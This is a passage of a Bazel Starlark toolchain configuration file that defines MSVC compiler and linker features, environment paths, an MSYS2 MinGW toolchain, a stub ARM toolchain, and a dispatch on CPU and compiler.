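    # The features below contribute flags and environment variables to the
    # actions configured above; most flag_groups expand build variables such
    # as %{output_execpath} only when those variables are available.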
msvc_link_env_feature = feature(
name = "msvc_link_env",
env_sets = [
env_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
env_entries = [env_entry(key = "LIB", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\LIB\\amd64;C:\\Program Files (x86)\\Windows Kits\\10\\lib\\10.0.10240.0\\ucrt\\x64;C:\\Program Files (x86)\\Windows Kits\\8.1\\lib\\winv6.3\\um\\x64;")],
),
],
)
shared_flag_feature = feature(
name = "shared_flag",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [flag_group(flags = ["/DLL"])],
),
],
)
determinism_feature = feature(
name = "determinism",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"/wd4117",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
),
],
),
],
)
sysroot_feature = feature(
name = "sysroot",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
iterate_over = "sysroot",
expand_if_available = "sysroot",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["%{unfiltered_compile_flags}"],
iterate_over = "unfiltered_compile_flags",
expand_if_available = "unfiltered_compile_flags",
),
],
),
],
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
input_param_flags_feature = feature(
name = "input_param_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["/IMPLIB:%{interface_library_output_path}"],
expand_if_available = "interface_library_output_path",
),
],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{libopts}"],
iterate_over = "libopts",
expand_if_available = "libopts",
),
],
),
flag_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
iterate_over = "libraries_to_link",
flag_groups = [
flag_group(
iterate_over = "libraries_to_link.object_files",
flag_groups = [flag_group(flags = ["%{libraries_to_link.object_files}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "object_file_group",
),
),
flag_group(
flag_groups = [flag_group(flags = ["%{libraries_to_link.name}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "object_file",
),
),
flag_group(
flag_groups = [flag_group(flags = ["%{libraries_to_link.name}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "interface_library",
),
),
flag_group(
flag_groups = [
flag_group(
flags = ["%{libraries_to_link.name}"],
expand_if_false = "libraries_to_link.is_whole_archive",
),
flag_group(
flags = ["/WHOLEARCHIVE:%{libraries_to_link.name}"],
expand_if_true = "libraries_to_link.is_whole_archive",
),
],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "static_library",
),
),
],
expand_if_available = "libraries_to_link",
),
],
),
],
)
fastbuild_feature = feature(
name = "fastbuild",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Od", "/Z7"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEBUG:FASTLINK", "/INCREMENTAL:NO"],
),
],
),
],
implies = ["generate_pdb_file"],
)
user_compile_flags_feature = feature(
name = "user_compile_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
archiver_flags_feature = feature(
name = "archiver_flags",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
flags = ["/OUT:%{output_execpath}"],
expand_if_available = "output_execpath",
),
],
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/MACHINE:X64"])],
),
],
)
static_link_msvcrt_feature = feature(name = "static_link_msvcrt")
dynamic_link_msvcrt_debug_feature = feature(
name = "dynamic_link_msvcrt_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MDd"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:msvcrtd.lib"])],
),
],
requires = [feature_set(features = ["dbg"])],
)
dbg_feature = feature(
name = "dbg",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Od", "/Z7"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEBUG:FULL", "/INCREMENTAL:NO"],
),
],
),
],
implies = ["generate_pdb_file"],
)
opt_feature = feature(
name = "opt",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/O2"])],
),
],
implies = ["frame_pointer"],
)
supports_interface_shared_libraries_feature = feature(
name = "supports_interface_shared_libraries",
enabled = True,
)
user_link_flags_feature = feature(
name = "user_link_flags",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{user_link_flags}"],
iterate_over = "user_link_flags",
expand_if_available = "user_link_flags",
),
],
),
],
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = [
"/DCOMPILER_MSVC",
"/DNOMINMAX",
"/D_WIN32_WINNT=0x0601",
"/D_CRT_SECURE_NO_DEPRECATE",
"/D_CRT_SECURE_NO_WARNINGS",
"/bigobj",
"/Zm500",
"/EHsc",
"/wd4351",
"/wd4291",
"/wd4250",
"/wd4996",
],
),
],
),
],
)
msvc_compile_env_feature = feature(
name = "msvc_compile_env",
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
],
env_entries = [env_entry(key = "INCLUDE", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE;C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt;")],
),
],
)
preprocessor_defines_feature = feature(
name = "preprocessor_defines",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
],
flag_groups = [
flag_group(
flags = ["/D%{preprocessor_defines}"],
iterate_over = "preprocessor_defines",
),
],
),
],
)
generate_pdb_file_feature = feature(
name = "generate_pdb_file",
requires = [
feature_set(features = ["dbg"]),
feature_set(features = ["fastbuild"]),
],
)
output_execpath_flags_feature = feature(
name = "output_execpath_flags",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/OUT:%{output_execpath}"],
expand_if_available = "output_execpath",
),
],
),
],
)
dynamic_link_msvcrt_no_debug_feature = feature(
name = "dynamic_link_msvcrt_no_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MD"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:msvcrt.lib"])],
),
],
requires = [
feature_set(features = ["fastbuild"]),
feature_set(features = ["opt"]),
],
)
disable_assertions_feature = feature(
name = "disable_assertions",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/DNDEBUG"])],
with_features = [with_feature_set(features = ["opt"])],
),
],
)
has_configured_linker_path_feature = feature(name = "has_configured_linker_path")
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
no_stripping_feature = feature(name = "no_stripping")
linker_param_file_feature = feature(
name = "linker_param_file",
flag_sets = [
flag_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
flags = ["@%{linker_param_file}"],
expand_if_available = "linker_param_file",
),
],
),
],
)
ignore_noisy_warnings_feature = feature(
name = "ignore_noisy_warnings",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.cpp_link_static_library],
flag_groups = [flag_group(flags = ["/ignore:4221"])],
),
],
)
no_legacy_features_feature = feature(name = "no_legacy_features")
parse_showincludes_feature = feature(
name = "parse_showincludes",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_header_parsing,
],
flag_groups = [flag_group(flags = ["/showIncludes"])],
),
],
)
static_link_msvcrt_no_debug_feature = feature(
name = "static_link_msvcrt_no_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MT"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:libcmt.lib"])],
),
],
requires = [
feature_set(features = ["fastbuild"]),
feature_set(features = ["opt"]),
],
)
treat_warnings_as_errors_feature = feature(
name = "treat_warnings_as_errors",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/WX"])],
),
],
)
windows_export_all_symbols_feature = feature(name = "windows_export_all_symbols")
no_windows_export_all_symbols_feature = feature(name = "no_windows_export_all_symbols")
include_paths_feature = feature(
name = "include_paths",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
],
flag_groups = [
flag_group(
flags = ["/I%{quote_include_paths}"],
iterate_over = "quote_include_paths",
),
flag_group(
flags = ["/I%{include_paths}"],
iterate_over = "include_paths",
),
flag_group(
flags = ["/I%{system_include_paths}"],
iterate_over = "system_include_paths",
),
],
),
],
)
linkstamps_feature = feature(
name = "linkstamps",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{linkstamp_paths}"],
iterate_over = "linkstamp_paths",
expand_if_available = "linkstamp_paths",
),
],
),
],
)
targets_windows_feature = feature(
name = "targets_windows",
enabled = True,
implies = ["copy_dynamic_libraries_to_binary"],
)
linker_subsystem_flag_feature = feature(
name = "linker_subsystem_flag",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/SUBSYSTEM:CONSOLE"])],
),
],
)
static_link_msvcrt_debug_feature = feature(
name = "static_link_msvcrt_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MTd"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:libcmtd.lib"])],
),
],
requires = [feature_set(features = ["dbg"])],
)
frame_pointer_feature = feature(
name = "frame_pointer",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Oy-"])],
),
],
)
compiler_output_flags_feature = feature(
name = "compiler_output_flags",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.assemble],
flag_groups = [
flag_group(
flag_groups = [
flag_group(
flags = ["/Fo%{output_file}", "/Zi"],
expand_if_available = "output_file",
expand_if_not_available = "output_assembly_file",
),
],
expand_if_not_available = "output_preprocess_file",
),
],
),
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flag_groups = [
flag_group(
flags = ["/Fo%{output_file}"],
expand_if_not_available = "output_preprocess_file",
),
],
expand_if_available = "output_file",
expand_if_not_available = "output_assembly_file",
),
flag_group(
flag_groups = [
flag_group(
flags = ["/Fa%{output_file}"],
expand_if_available = "output_assembly_file",
),
],
expand_if_available = "output_file",
),
flag_group(
flag_groups = [
flag_group(
flags = ["/P", "/Fi%{output_file}"],
expand_if_available = "output_preprocess_file",
),
],
expand_if_available = "output_file",
),
],
),
],
)
nologo_feature = feature(
name = "nologo",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
flag_groups = [flag_group(flags = ["/nologo"])],
),
],
)
smaller_binary_feature = feature(
name = "smaller_binary",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Gy", "/Gw"])],
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/OPT:ICF", "/OPT:REF"])],
with_features = [with_feature_set(features = ["opt"])],
),
],
)
compiler_input_flags_feature = feature(
name = "compiler_input_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["/c", "%{source_file}"],
expand_if_available = "source_file",
),
],
),
],
)
def_file_feature = feature(
name = "def_file",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEF:%{def_file_path}", "/ignore:4070"],
expand_if_available = "def_file_path",
),
],
),
],
)
msvc_env_feature = feature(
name = "msvc_env",
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\BIN\\amd64;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319;C:\\Windows\\Microsoft.NET\\Framework64\\;C:\\Program Files (x86)\\Windows Kits\\8.1\\bin\\x64;C:\\Program Files (x86)\\Windows Kits\\8.1\\bin\\x86;;C:\\Windows\\system32"),
env_entry(key = "TMP", value = "C:\\Users\\ContainerAdministrator\\AppData\\Local\\Temp"),
env_entry(key = "TEMP", value = "C:\\Users\\ContainerAdministrator\\AppData\\Local\\Temp"),
],
),
],
implies = ["msvc_compile_env", "msvc_link_env"],
)
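    # With no_legacy_features listed, Bazel adds none of its built-in
    # features, so everything this toolchain needs is enumerated here.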
features = [
no_legacy_features_feature,
nologo_feature,
has_configured_linker_path_feature,
no_stripping_feature,
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
default_compile_flags_feature,
msvc_env_feature,
msvc_compile_env_feature,
msvc_link_env_feature,
include_paths_feature,
preprocessor_defines_feature,
parse_showincludes_feature,
generate_pdb_file_feature,
shared_flag_feature,
linkstamps_feature,
output_execpath_flags_feature,
archiver_flags_feature,
input_param_flags_feature,
linker_subsystem_flag_feature,
user_link_flags_feature,
default_link_flags_feature,
linker_param_file_feature,
static_link_msvcrt_feature,
static_link_msvcrt_no_debug_feature,
dynamic_link_msvcrt_no_debug_feature,
static_link_msvcrt_debug_feature,
dynamic_link_msvcrt_debug_feature,
dbg_feature,
fastbuild_feature,
opt_feature,
frame_pointer_feature,
disable_assertions_feature,
determinism_feature,
treat_warnings_as_errors_feature,
smaller_binary_feature,
ignore_noisy_warnings_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
compiler_output_flags_feature,
compiler_input_flags_feature,
def_file_feature,
windows_export_all_symbols_feature,
no_windows_export_all_symbols_feature,
supports_dynamic_linker_feature,
supports_interface_shared_libraries_feature,
]
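    # Windows artifact naming: no "lib" prefix and MSVC-style extensions.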
artifact_name_patterns = [
artifact_name_pattern(
category_name = "object_file",
prefix = "",
extension = ".obj",
),
artifact_name_pattern(
category_name = "static_library",
prefix = "",
extension = ".lib",
),
artifact_name_pattern(
category_name = "alwayslink_static_library",
prefix = "",
extension = ".lo.lib",
),
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
artifact_name_pattern(
category_name = "dynamic_library",
prefix = "",
extension = ".dll",
),
artifact_name_pattern(
category_name = "interface_library",
prefix = "",
extension = ".if.lib",
),
]
make_variables = []
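    # Legacy tool_paths; tools with no MSVC equivalent point at a no-op
    # batch script.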
tool_paths = [
tool_path(name = "ar", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe"),
tool_path(name = "ml", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe"),
tool_path(name = "cpp", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcc", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcov", path = "wrapper/bin/msvc_nop.bat"),
tool_path(name = "ld", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe"),
tool_path(name = "nm", path = "wrapper/bin/msvc_nop.bat"),
tool_path(
name = "objcopy",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "objdump",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "strip",
path = "wrapper/bin/msvc_nop.bat",
),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
        cc_target_os = cc_target_os,
)
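# Toolchain for x64 Windows builds with MinGW GCC from MSYS2.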
def _windows_msys_mingw_impl(ctx):
toolchain_identifier = "msys_x64_mingw"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "mingw"
compiler = "mingw-gcc"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
action_configs = []
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/mingw64/bin"),
],
),
],
)
msys_mingw_flags = [
"-std=gnu++0x",
]
msys_mingw_link_flags = [
"-lstdc++",
]
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = msys_mingw_flags)] if msys_mingw_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = msys_mingw_link_flags)] if msys_mingw_link_flags else []),
),
],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
default_compile_flags_feature,
default_link_flags_feature,
supports_dynamic_linker_feature,
]
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
"c:/tools/msys64/mingw64/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
artifact_name_patterns = [
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/mingw64/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/mingw64/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/mingw64/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/mingw64/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/mingw64/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/mingw64/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/mingw64/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/mingw64/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/mingw64/bin/strip"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
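# Stub armeabi-v7a toolchain: every tool resolves to /bin/false, so the
# toolchain can be selected but cannot actually build anything.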
def _armeabi_impl(ctx):
toolchain_identifier = "stub_armeabi-v7a"
host_system_name = "armeabi-v7a"
target_system_name = "armeabi-v7a"
target_cpu = "armeabi-v7a"
target_libc = "armeabi-v7a"
compiler = "compiler"
abi_version = "armeabi-v7a"
abi_libc_version = "armeabi-v7a"
cc_target_os = None
builtin_sysroot = None
action_configs = []
supports_pic_feature = feature(name = "supports_pic", enabled = True)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [supports_dynamic_linker_feature, supports_pic_feature]
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
]
artifact_name_patterns = []
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "/bin/false"),
tool_path(name = "compat-ld", path = "/bin/false"),
tool_path(name = "cpp", path = "/bin/false"),
tool_path(name = "dwp", path = "/bin/false"),
tool_path(name = "gcc", path = "/bin/false"),
tool_path(name = "gcov", path = "/bin/false"),
tool_path(name = "ld", path = "/bin/false"),
tool_path(name = "nm", path = "/bin/false"),
tool_path(name = "objcopy", path = "/bin/false"),
tool_path(name = "objdump", path = "/bin/false"),
tool_path(name = "strip", path = "/bin/false"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
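# Dispatch on (cpu, compiler). Any combination not matched below falls
# through to the MSYS2 GCC configuration built inline.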
def _impl(ctx):
if ctx.attr.cpu == "armeabi-v7a":
return _armeabi_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "msvc-cl":
return _windows_msvc_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "mingw-gcc":
return _windows_msys_mingw_impl(ctx)
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/usr/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/usr/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/usr/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/usr/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/usr/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/usr/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/usr/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/usr/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/usr/bin/strip"),
]
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
action_configs = []
compile_flags = [
]
dbg_compile_flags = [
]
opt_compile_flags = [
]
cxx_flags = [
"-std=gnu++0x",
]
link_flags = [
"-lstdc++",
]
opt_link_flags = [
]
unfiltered_compile_flags = [
]
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
